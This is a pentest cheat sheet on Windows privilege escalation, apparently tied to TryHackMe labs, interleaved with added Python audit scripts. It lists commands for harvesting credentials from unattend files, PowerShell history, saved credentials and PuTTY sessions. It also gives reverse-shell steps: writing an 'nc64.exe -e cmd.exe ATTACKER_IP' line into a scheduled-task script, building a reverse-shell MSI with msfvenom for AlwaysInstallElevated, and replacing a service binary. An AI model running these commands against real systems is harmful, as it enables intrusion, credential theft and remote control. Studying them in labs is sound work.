Pentest Tips
Windows PrivEsc

Password Harvesting

The easiest way to elevate your privileges is to steal credentials that an application or installer has left behind.

Unattended Windows installations:

Credentials left behind by automated Windows installations may be found in:

  • C:\Unattend.xml

  • C:\Windows\Panther\Unattend.xml

  • C:\Windows\Panther\Unattend\Unattend.xml

  • C:\Windows\system32\sysprep.inf

  • C:\Windows\system32\sysprep\sysprep.xml

<Credentials>
    <Username>Administrator</Username>
    <Domain>thm.local</Domain>
    <Password>MyPassword123</Password>
</Credentials>
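As an added example (not code from the original page), the script below audits answer files collected from the locations above for leftover credentials. It parses the XML layout shown above, also handling the Microsoft unattend namespace and the `<Value>`/`<PlainText>` variant of the password element, and treats `sysprep.inf` as an INI file; it reports who the credential belongs to and how long the secret is without echoing the secret itself. The file paths and contents it runs on are constructed sample data, not files from a real host.

```python
"""Audit answer files collected from a host for leftover credentials.

Added example, not code from the original page: it parses the unattend
XML layout shown above (handling the Microsoft unattend namespace and the
<Value>/<PlainText> variant) plus INI-style sysprep.inf files, and reports
each stored password without echoing the secret itself. All file paths and
contents below are constructed sample data, not files from a real system.
"""
import re
import xml.etree.ElementTree as ET


def _local(tag):
    """Strip an XML namespace: '{urn:schemas-microsoft-com:unattend}Password' -> 'Password'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    """Text of the first direct child of `elem` whose local name is `name`, else None."""
    for child in elem:
        if _local(child.tag) == name and child.text and child.text.strip():
            return child.text.strip()
    return None


def scan_unattend_xml(path, text):
    """One finding per password-carrying element in an unattend-style XML document."""
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return []  # not XML (or truncated): nothing to report for this file
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        # Matches <Password> (as on the page) and e.g. <AdministratorPassword>.
        if not _local(elem.tag).lower().endswith("password"):
            continue
        # Two layouts exist: <Password>secret</Password> and
        # <Password><Value>secret</Value><PlainText>true|false</PlainText></Password>.
        value = _child_text(elem, "Value") or (elem.text or "").strip()
        if not value:
            continue
        plaintext = (_child_text(elem, "PlainText") or "true").lower() == "true"
        holder = parents.get(elem)
        findings.append({
            "path": path,
            "username": _child_text(holder, "Username") if holder is not None else None,
            "domain": _child_text(holder, "Domain") if holder is not None else None,
            "plaintext": plaintext,
            "secret_length": len(value),  # the secret itself is never echoed
        })
    return findings


# Any INI key whose name contains "password" (e.g. AdminPassword=...), quoted or not.
INI_SECRET_RE = re.compile(
    r'^\s*(?P<key>[^=;\s]*password[^=\s]*)\s*=\s*"?(?P<val>[^"\r\n]*)',
    re.IGNORECASE | re.MULTILINE,
)


def scan_sysprep_inf(path, text):
    """Findings for INI-style sysprep.inf files; a bare '*' value is a placeholder, not a secret."""
    return [
        {"path": path, "key": m.group("key"), "plaintext": True,
         "secret_length": len(m.group("val").strip())}
        for m in INI_SECRET_RE.finditer(text)
        if m.group("val").strip() not in ("", "*")
    ]


def audit_files(files):
    """`files` maps path -> contents as collected from the locations listed above."""
    findings = []
    for path, text in files.items():
        scanner = scan_sysprep_inf if path.lower().endswith(".inf") else scan_unattend_xml
        findings.extend(scanner(path, text))
    return findings


# Constructed sample contents modelled on the snippet above (not from a real host).
SAMPLE_FILES = {
    r"C:\Windows\Panther\Unattend.xml": """<?xml version="1.0"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="specialize">
    <component name="Microsoft-Windows-UnattendedJoin">
      <Identification>
        <Credentials>
          <Username>Administrator</Username>
          <Domain>thm.local</Domain>
          <Password>MyPassword123</Password>
        </Credentials>
      </Identification>
    </component>
  </settings>
</unattend>""",
    r"C:\Windows\system32\sysprep.inf": '[GuiUnattended]\nAdminPassword="S3cr3t!"\nTimeZone=004\n',
    r"C:\Unattend.xml": '<unattend><settings pass="oobeSystem"/></unattend>',
}

if __name__ == "__main__":
    for f in audit_files(SAMPLE_FILES):
        who = f.get("username") or f.get("key")
        print(f"{f['path']}: {who} ({f['secret_length']}-char password, plaintext={f['plaintext']})")
```

The namespace handling matters in practice: real answer files declare `xmlns="urn:schemas-microsoft-com:unattend"`, so a naive search for the literal tag `Password` finds nothing. Files that produce a finding should be removed or have the credential rotated, since anyone who can read them holds the account.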

PowerShell history

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows credentials

:: List credentials saved for the current user
cmdkey /list

:: Run a command using a saved credential
runas /savedcred /user:admin cmd.exe

IIS Config

  • C:\inetpub\wwwroot\web.config

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

PuTTY saved sessions (proxy credentials are stored in the registry):

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Quick wins

Scheduled Tasks

:: List scheduled tasks
schtasks

:: Show the details of one task (the command it runs and the account it runs as)
schtasks /query /tn vulntask /fo list /v

:: Check whether the current user can modify the script or binary the task runs
icacls c:\path\to\vulntask

:: Overwrite the task's script with a netcat reverse shell (assumes netcat is in c:\tools), then trigger the task
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask

AlwaysInstallElevated

:: AlwaysInstallElevated must be set to 1 in BOTH of these keys
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
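The policy only takes effect when the value is set under both hives, and a quick read of the two query outputs often misses that. As an added example (not code from the original page), this helper parses the output of the two `reg query` commands above and reports the setting as effective only when both hives carry `AlwaysInstallElevated = 0x1`. The `reg query` output it runs on is constructed sample text.

```python
"""Check whether AlwaysInstallElevated is effective from `reg query` output.

Added example, not code from the original page. The policy only applies when
the AlwaysInstallElevated DWORD is 1 under BOTH hives queried above; a value
in one hive alone does nothing. The `reg query` output below is constructed
sample text, not captured from a real host.
"""
import re

# One REG_DWORD line as `reg query` prints it, e.g. "    AlwaysInstallElevated    REG_DWORD    0x1".
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x(?P<hex>[0-9a-fA-F]+)\s*$",
    re.MULTILINE,
)


def parse_always_install_elevated(output):
    """Integer value of AlwaysInstallElevated in one `reg query` output, or None if absent."""
    m = VALUE_RE.search(output)
    return int(m.group("hex"), 16) if m else None


def always_install_elevated_enabled(hkcu_output, hklm_output):
    """True only when both the HKCU and the HKLM key set the value to 1."""
    return (parse_always_install_elevated(hkcu_output) == 1
            and parse_always_install_elevated(hklm_output) == 1)


# Constructed sample outputs for the two queries above.
HKCU_SET = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
HKLM_SET = HKCU_SET.replace("HKEY_CURRENT_USER", "HKEY_LOCAL_MACHINE")
HKLM_CLEARED = HKLM_SET.replace("0x1", "0x0")
HKLM_MISSING = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    cases = (("both set", HKLM_SET), ("HKLM cleared", HKLM_CLEARED), ("HKLM missing", HKLM_MISSING))
    for name, hklm in cases:
        print(f"{name}: effective={always_install_elevated_enabled(HKCU_SET, hklm)}")
```

Remediation is the mirror image of the check: clear the value (or set it to 0) in both keys, since leaving it set in either hive invites it being completed later.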

Create an MSI payload to abuse the elevated install permission:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f msi -o malicious.msi

Run the MSI on the Windows host:

msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Service based

:: Show the service configuration (binary path, start type, run-as account)
sc qc <service name>

:: Check the permissions on the service binary
icacls <path to bin>

:: Back up the original service binary
move WService.exe WService.exe.bkp

:: Replace it with the malicious binary and make sure the service account can execute it
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

:: Restart the service (use the service name shown by sc qc)
sc stop windowsscheduler
sc start windowsscheduler
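Both the scheduled-task step and the service step above hinge on the same `icacls <path>` check, and reading its output by eye is error-prone: rights are spread over several parenthesised groups, inheritance markers look like rights, and a `(DENY)` entry looks like a grant. As an added example (not code from the original page), the parser below turns `icacls` output into ACEs and flags any write-class right granted to a principal every local user belongs to. The `icacls` output it runs on is constructed sample text, not captured from a real host.

```python
"""Flag task scripts and service binaries writable by low-privileged users.

Added example, not code from the original page. It parses the output of the
`icacls <path>` check used in both the scheduled-task and the service steps
above and reports every ACE that grants write-class rights to a principal
every local user belongs to. The icacls output below is constructed sample
text, not captured from a real host.
"""
import re

# Principals that effectively include any local user. Add the account you
# are auditing as (from `whoami`) via the extra_principals parameter.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}

# Simple and specific rights that let the holder change the file or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "GA", "GW", "D", "DC"}

# Inheritance/propagation markers and the deny marker are not rights.
FLAG_TOKENS = {"I", "OI", "CI", "IO", "NP", "DENY"}

ACE_RE = re.compile(r"^(?P<account>[^()]+?):(?P<groups>(?:\([^)]*\))+)$")


def parse_icacls(path, output):
    """Return (account, flags, rights) for each ACE icacls printed for `path`.

    icacls prints the path only in front of the first ACE; later ACEs are on
    indented continuation lines, and a 'Successfully processed ...' summary
    follows, which the regex does not match.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        flags, rights = set(), set()
        for group in re.findall(r"\(([^)]*)\)", m.group("groups")):
            tokens = {t.strip() for t in group.split(",") if t.strip()}
            if tokens and tokens <= FLAG_TOKENS:
                flags |= tokens
            else:
                rights |= tokens
        aces.append((m.group("account").strip(), flags, rights))
    return aces


def writable_by_low_priv(path, output, extra_principals=()):
    """ACEs on `path` that let a low-privileged principal modify it, as (account, rights)."""
    principals = LOW_PRIV_PRINCIPALS | {p.lower() for p in extra_principals}
    hits = []
    for account, flags, rights in parse_icacls(path, output):
        if "DENY" in flags:
            continue  # an explicit deny grants nothing
        granted = rights & WRITE_RIGHTS
        if account.lower() in principals and granted:
            hits.append((account, sorted(granted)))
    return hits


# Constructed sample: the task script from the page, with Users holding Full control.
TASK_SCRIPT = r"C:\tasks\schtask.bat"
TASK_ICACLS = r"""C:\tasks\schtask.bat BUILTIN\Users:(F)
                     NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample: a service binary that is correctly locked down (path is hypothetical).
SERVICE_BIN = r"C:\Program Files\WService\WService.exe"
SERVICE_ICACLS = r"""C:\Program Files\WService\WService.exe NT AUTHORITY\SYSTEM:(I)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for target, out in ((TASK_SCRIPT, TASK_ICACLS), (SERVICE_BIN, SERVICE_ICACLS)):
        print(target, "->", writable_by_low_priv(target, out) or "no low-privileged write access")
```

The path is passed in explicitly because `icacls` prefixes only the first ACE with it and paths may contain spaces, so the parser cannot split the first line on whitespace. The fix for a hit is the same in both cases: remove the write-class right for the broad principal so that only administrators (and SYSTEM) can change what the task or service executes.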

Permission abuse

:: List the current user's privileges
whoami /priv

On the attacker machine, start an authenticated SMB share:

mkdir share
/opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

Last updated 2 years ago